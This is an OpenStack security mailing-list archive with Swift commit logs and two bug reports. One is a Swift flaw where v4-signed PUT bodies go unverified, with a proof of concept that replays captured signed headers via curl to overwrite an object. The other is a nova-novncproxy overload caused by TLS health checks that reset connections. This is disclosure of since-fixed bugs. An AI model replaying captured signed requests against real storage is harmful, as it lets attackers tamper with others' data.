Change-Id: I44df8736d0c33fc2c58c9be6b5b8023932f14a83 commit 53b56b65512fabc97890464c91faafdd0e3dbdaf Author: John Dickinson Date: Wed Mar 13 11:41:00 2019 -0700 crediting contributors to the un-landed hummingbird branch Change-Id: I51708cb2f0deca61b147589e062b520ac7a1807e commit fa678949ae310aa0499938fef788ec04409625d9 Author: Tim Burke Date: Wed May 30 11:43:40 2018 -0700 Fix quoting for large objects Change-Id: I46bdb6da8f778a6c86e0f8e883b52fc31e9fd44e Partial-Bug: 1774238 Closes-Bug: 1678022 Closes-Bug: 1598093 Closes-Bug: 1762997 commit a30a477755f669a11aef5ce492f287627565d978 Author: Kota Tsuyuzaki Date: Wed Feb 27 12:52:06 2019 +0900 Stop overwriting reserved term `dir` is a reserved instruction term in python, so this patch avoiding to assing a value to it. Change-Id: If780c4ffb72808b834e25a396665f17bd8383870 commit 74664af7ed761a729fbb9130e86ccff4070f0dcb Author: Michele Valsecchi Date: Tue Mar 12 13:56:27 2019 +0900 Fix a typo Replace 'o' with 'to'. Change-Id: I0a9b1547016b2662002c050e8388591d7d91ef97 commit 13e7f3641e3bffbcf89733ebb50d3ca6847105c6 Author: zhufl Date: Mon Mar 11 14:28:20 2019 +0800 Do not use self in classmethod cls should be used in classmethd, instead of self. Change-Id: I149b18935ce909ef978f2b7147b109e11c22f923 commit e1a12dc3dd04bc63d6b5b31d4ffd6a96bf8af918 Author: Clay Gerrard Date: Wed Mar 6 16:37:59 2019 -0800 Refactor write_affinity DELETE handling There's some code duplication we can drop, and some tests scenarios we can expand on. I don't believe there's any behavior change here. Change-Id: I2271d1cb757c989c4b0bfe228cd26c8620a151db commit d748851766309b7def5947025457de820219f9ec Author: Tim Burke Date: Tue Mar 5 14:50:22 2019 -0800 s3token: Add note about config change when upgrading from swift3 Change-Id: I2610cbdc9b7bc2b4d614eaedb4f3369d7a424ab3 commit d185b607bbdda8b47b0bb090f045a6b4ad8ed8b9 Author: Tim Burke Date: Mon Mar 4 17:37:09 2019 -0800 docs: clean up SAIO formatting Drive-by: use six.moves in s3api; fix "unexpected indent" warning when building docs on py3 Change-Id: I2a354e2624c763a68fcea7a6404e9c2fde30d631 commit 4ac81ebbd73784e0e1faf7c3e983b38ea4a66754 Author: Tim Burke Date: Fri Mar 1 13:04:58 2019 -0800 py3: fix copying unicode names Turns out, unquote()ing WSGI strings is a great way to mangle them. Change-Id: I42a08d84aa22a1a7ee7ccab97aaec55d845264f9 commit 5d4303edbf601c5ff692a378c11ed5da9aa407c9 Author: Tim Burke Date: Thu Feb 21 14:34:48 2019 -0800 manage-shard-ranges: nicer message if we can't get_info() Tracebacks are ugly. Change-Id: I09b907608127e4c633b554be2926245b35402dbf commit 61e6ac0ebddc630390dfbe1292cd392c57f0ca07 Author: Pete Zaitcev Date: Tue Feb 26 23:06:52 2019 -0600 py3: port formpost middleware Change-Id: I8f3d4d5f6976ef5b63facd9b5723aac894066b74 commit baf18edc00851f6749a40794587ca14a52135bf3 Author: Tim Burke Date: Thu Oct 18 10:35:31 2018 -0700 Clean up account-reaper a bit - Drop the (partial) logging translation - Save our log concatenations until the end - Stop encoding object names; direct_client is happy to take Unicode - Remove a couple loop breaks that were only used by tests Change-Id: I4a4f301a7a6cb0f217ca0bf8712ee0291bbc14a3 Partial-Bug: #1674543 commit 9b3ca9423eb8cf9420a3e98f60cd56dd281b4208 Author: Simeon Gourlin Date: Tue Jan 29 09:13:16 2019 +0100 Fix decryption for broken objects Try to get decryption object key from stored metadata (key_id path from X-Object-Sysmeta-Crypto-Body-Meta) because sometime object.path is wrong during encryption process. 
This patch doesn't solve the underlying issue, but is needed to decrypt already wrongly stored objects. Change-Id: I1a6bcdebdb46ef03c342428aeed73ae76db29922 Co-Author: Thomas Goirand Partial-Bug: #1813725 commit 3a8f5dbf9c49fdf1cf2d0b7ba35b82f25f88e634 Author: Tim Burke Date: Tue Dec 11 15:29:35 2018 -0800 Verify client input for v4 signatures Previously, we would use the X-Amz-Content-SHA256 value when calculating signatures, but wouldn't actually check the content that was sent. This would allow a malicious third party that managed to capture the headers for an object upload to overwrite that with arbitrary content provided they could do so within the 5-minute clock-skew window. Now, we wrap the wsgi.input that's sent on to the proxy-server app to hash content as it's read and raise an error if there's a mismatch. Note that clients using presigned-urls to upload have no defense against a similar replay attack. Notwithstanding the above security consideration, this *also* provides better assurances that the client's payload was received correctly. Note that this *does not* attempt to send an etag in footers, however, so the proxy-to-object-server connection is not guarded against bit-flips. In the future, Swift will hopefully grow a way to perform SHA256 verification on the object-server. This would offer two main benefits: - End-to-end message integrity checking. - Move CPU load of calculating the hash from the proxy (which is somewhat CPU-bound) to the object-server (which tends to have CPU to spare). Change-Id: I61eb12455c37376be4d739eee55a5f439216f0e9 Closes-Bug: 1765834 commit 37693a4e1523fc61d653e231e57d33b37464c2b5 Author: Tim Burke Date: Thu Dec 27 22:34:05 2018 +0000 Run ceph-s3-tests job less We don't need it for unit-test-only changes or most doc changes. Change-Id: I803e0dc6861786db44cbcf5943032424ba319d54 commit a563ba26fa3d9dfb23b368ed79940c19e3a9135c Author: HCLTech-SSW Date: Mon May 14 23:23:57 2018 -0700 Implemented the fix to handle the HTTP request methods other than GET. Change-Id: I8db01a5a59f72c562aa8039b459a965283b1b3ad Closes-Bug: #1695855 ** Tags added: in-feature-losf -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' 
> bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 
's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 
Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... * TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions From 1816727 at bugs.launchpad.net Fri Mar 29 21:07:03 2019 From: 1816727 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 29 Mar 2019 21:07:03 -0000 Subject: [Openstack-security] =?utf-8?q?=5BBug_1816727=5D_Re=3A_nova-novnc?= =?utf-8?q?proxy_does_not_handle_TCP_RST_cleanly_when_using_SSL=C2=A0?= References: <155065649227.28374.17032096910895521610.malonedeb@chaenomeles.canonical.com> Message-ID: <155389362341.17717.10300129098249857198.malone@gac.canonical.com> Reviewed: https://review.openstack.org/644998 Committed: https://git.openstack.org/cgit/openstack/nova/commit/?id=e4fa061f17353f49615d4850b562699d55a0641b Submitter: Zuul Branch: master commit e4fa061f17353f49615d4850b562699d55a0641b Author: melanie witt Date: Wed Mar 20 19:01:33 2019 +0000 Move create of ComputeAPI object in websocketproxy Currently, we create a compute.rpcapi.ComputeAPI object during NovaProxyRequestHandler.__init__ in order to make calls to nova-compute for console token authorizations (port validation). This is problematic in the event that we receive a TCP RST as it results in constructing a ComputeAPI object only to throw it away and a large number of TCP RST sent can cause excessive resource consumption. This moves the creation of the ComputeAPI object from __init__ to being lazily instantiated upon first use by access of a property, thus avoiding creation of ComputeAPI objects when we receive TCP RST messages. Closes-Bug: #1816727 Change-Id: I3fe5540ea460fb32767b5e681295fdaf89ce17c5 ** Changed in: nova Status: In Progress => Fix Released -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. 
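The commit message above moves the compute.rpcapi.ComputeAPI construction out of NovaProxyRequestHandler.__init__ and behind a property that is only evaluated on first use, so a connection that is torn down by an early TCP RST never pays for it. The pattern it relies on, in a generic sketch with placeholder classes rather than nova's actual ones:

```
# Generic lazy-instantiation sketch: defer building the expensive object
# until a request actually needs it, instead of paying in __init__.
class ExpensiveComputeAPI(object):        # stand-in for compute.rpcapi.ComputeAPI
    def __init__(self):
        print('setting up RPC / loading cells ...')   # the costly part

    def validate_console_token(self, token):
        return token == 'secret'


class ProxyRequestHandler(object):        # stand-in for NovaProxyRequestHandler
    def __init__(self):
        self._compute_rpcapi = None       # nothing expensive happens here

    @property
    def compute_rpcapi(self):
        # Built on first access only; handlers whose sockets die before
        # sending a real request never reach this point.
        if self._compute_rpcapi is None:
            self._compute_rpcapi = ExpensiveComputeAPI()
        return self._compute_rpcapi

    def new_websocket_client(self, token):
        return self.compute_rpcapi.validate_console_token(token)
```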
https://bugs.launchpad.net/bugs/1816727 Title: nova-novncproxy does not handle TCP RST cleanly when using SSL Status in OpenStack Compute (nova): Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: Description =========== We have nova-novncproxy configured to use SSL: ``` [DEFAULT] ssl_only=true cert = /etc/nova/ssl/certs/signing_cert.pem key = /etc/nova/ssl/private/signing_key.pem ... [vnc] enabled = True server_listen = "0.0.0.0" server_proxyclient_address = 192.168.237.81 novncproxy_host = 192.168.237.81 novncproxy_port = 5554 novncproxy_base_url = https://:6080/vnc_auto.html xvpvncproxy_host = 192.168.237.81 ``` We also have haproxy acting as a load balancer, but not terminating SSL. We have an haproxy health check configured like this for nova- novncproxy: ``` listen nova-novncproxy     # irrelevant config...     server 192.168.237.84:5554 check check-ssl verify none inter 2000 rise 5 fall 2 ``` where 192.168.237.81 is a virtual IP address and 192.168.237.84 is the node's individual IP address. With that health check enabled, we found the nova-novncproxy process CPU spiking and eventually causing the node to hang. With debug logging enabled, we noticed this in the nova-novncproxy logs: 2019-02-19 15:02:44.148 2880 INFO nova.console.websocketproxy [-] WebSocket server settings: 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Listen on 192.168.237.81:5554 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Flash security policy server 2019-02-19 15:02:44.149 2880 INFO nova.console.websocketproxy [-] - Web server (no directory listings). Web root: /usr/share/novnc 2019-02-19 15:02:44.150 2880 INFO nova.console.websocketproxy [-] - SSL/TLS support 2019-02-19 15:02:44.151 2880 INFO nova.console.websocketproxy [-] - proxying from 192.168.237.81:5554 to None:None 2019-02-19 15:02:45.015 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.184 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.377 2889 DEBUG nova.context [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Found 2 cells: 00000000-0000-0000-0000-000000000000(cell0),9f9825dd-868f-41cc-9c8e-e544f1528d6a(cell1) load_cells /usr/lib/python2.7/site-packages/nova/context.py:479 2019-02-19 15:02:45.380 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.382 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "00000000-0000-0000-0000-000000000000" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.002s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.393 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" acquired by "nova.context.get_or_set_cached_cell_and_set_connections" :: waited 
0.000s inner /usr/lib/python2.7/site-packag es/oslo_concurrency/lockutils.py:273 2019-02-19 15:02:45.395 2889 DEBUG oslo_concurrency.lockutils [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Lock "9f9825dd-868f-41cc-9c8e-e544f1528d6a" released by "nova.context.get_or_set_cached_cell_and_set_connections" :: held 0.003s inner /usr/lib/python2.7/site-packages /oslo_concurrency/lockutils.py:285 2019-02-19 15:02:45.437 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.443 2889 DEBUG oslo_db.sqlalchemy.engines [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] MySQL server mode set to STRICT_TRANS_TABLES,STRICT_ALL_TABLES,NO_ZERO_IN_DATE,NO_ZERO_DATE,ERROR_FOR_DIVISION_BY_ZERO,TRADITIONAL,NO_AUTO_CREATE_USER,NO_ENGINE_SUBSTI TUTION _check_effective_sql_mode /usr/lib/python2.7/site-packages/oslo_db/sqlalchemy/engines.py:308 2019-02-19 15:02:45.451 2889 INFO nova.compute.rpcapi [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] Automatically selected compute RPC version 5.0 from minimum service version 35 2019-02-19 15:02:45.452 2889 INFO nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] handler exception: [Errno 104] Connection reset by peer 2019-02-19 15:02:45.452 2889 DEBUG nova.console.websocketproxy [req-8552f48d-8c1c-4330-aaec-64d544c6cc1e - - - - -] exception vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy Traceback (most recent call last): 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 928, in top_new_client 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy client = self.do_handshake(startsock, address) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 858, in do_handshake 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.RequestHandlerClass(retsock, address, self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/nova/console/websocketproxy.py", line 311, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy websockify.ProxyRequestHandler.__init__(self, *args, **kwargs) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 113, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.__init__(self, req, addr, server) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/SocketServer.py", line 652, in __init__ 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy self.handle() 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib/python2.7/site-packages/websockify/websocket.py", line 579, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy SimpleHTTPRequestHandler.handle(self) 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy File "/usr/lib64/python2.7/BaseHTTPServer.py", line 340, in handle 2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy 
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy     self.handle_one_request()
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy   File "/usr/lib64/python2.7/BaseHTTPServer.py", line 310, in handle_one_request
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy     self.raw_requestline = self.rfile.readline(65537)
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy   File "/usr/lib64/python2.7/socket.py", line 480, in readline
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy     data = self._sock.recv(self._rbufsize)
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy   File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 190, in recv
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy     return self._base_recv(buflen, flags, into=False)
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy   File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 217, in _base_recv
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy     read = self.read(nbytes)
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy   File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 135, in read
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy     super(GreenSSLSocket, self).read, *args, **kwargs)
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy   File "/usr/lib/python2.7/site-packages/eventlet/green/ssl.py", line 109, in _call_trampolining
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy     return func(*a, **kw)
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy   File "/usr/lib64/python2.7/ssl.py", line 673, in read
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy     v = self._sslobj.read(len)
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy error: [Errno 104] Connection reset by peer
2019-02-19 15:02:45.452 2889 ERROR nova.console.websocketproxy
2019-02-19 15:02:47.037 2880 DEBUG nova.console.websocketproxy [-] 192.168.237.85: new handler Process vmsg /usr/lib/python2.7/site-packages/websockify/websocket.py:873

(paste: http://paste.openstack.org/show/745451/)

This sequence, starting with "new handler Process", repeats continuously. It seems that the haproxy health checks initiate an SSL connection but then immediately send a TCP RST: http://git.haproxy.org/?p=haproxy.git;a=commit;h=fd29cc537b8511db6e256529ded625c8e7f856d0

For most services this does not seem to be an issue, but for nova-novncproxy it repeatedly initializes NovaProxyRequestHandler, which creates a full nova.compute.rpcapi.ComputeAPI instance and very quickly starts to consume significant CPU, overwhelming the host. Note that we tried upgrading to HEAD of websockify and eventlet, which did not improve the issue.

Our workaround was to turn off check-ssl in haproxy and use a basic tcp check, but we're concerned that nova-novncproxy remains vulnerable to a DoS attack given how easy it is for haproxy to overload the service. For that reason I'm opening this initially as a security bug, though you could perhaps argue that it's no secret that sending un-rate-limited requests to any service will cause high load.
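One way to keep such aborted probes cheap, sketched below purely as an illustration (the class and helper names are hypothetical, and this is not presented as the change that addressed the bug): build the expensive nova.compute.rpcapi.ComputeAPI object lazily, on first real use, instead of in every NovaProxyRequestHandler.__init__, so that a connection which dies during the TLS handshake never pays for RPC/DB setup.

    class LazyProxyRequestHandler(object):
        """Hypothetical sketch, not nova code: defer expensive setup.

        Per the traceback above, NovaProxyRequestHandler builds a full
        nova.compute.rpcapi.ComputeAPI in __init__, so every aborted TLS
        probe pays for RPC/DB setup.  Memoizing that object behind a
        property means a connection that dies during the handshake never
        triggers the expensive work.
        """

        def __init__(self):
            # Cheap: no RPC/DB work happens while the connection is set up.
            self._compute_rpcapi = None

        def _build_compute_rpcapi(self):
            # Stand-in for the costly construction (ComputeAPI, cell
            # lookups, database connections, ...).
            print("expensive setup runs now")
            return object()

        @property
        def compute_rpcapi(self):
            # Built on first use only, then cached on the instance.
            if self._compute_rpcapi is None:
                self._compute_rpcapi = self._build_compute_rpcapi()
            return self._compute_rpcapi

    # A probe that connects and resets never touches .compute_rpcapi, so
    # the handler stays cheap; a real console request pays the cost once.
    handler = LazyProxyRequestHandler()
    _ = handler.compute_rpcapi  # first real use triggers the setup
    _ = handler.compute_rpcapi  # cached thereafter

Whether a pattern like this would be safe in the real proxy (for example under eventlet concurrency) would need review; the sketch is only meant to show where the per-connection cost comes from.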
Steps to reproduce
==================

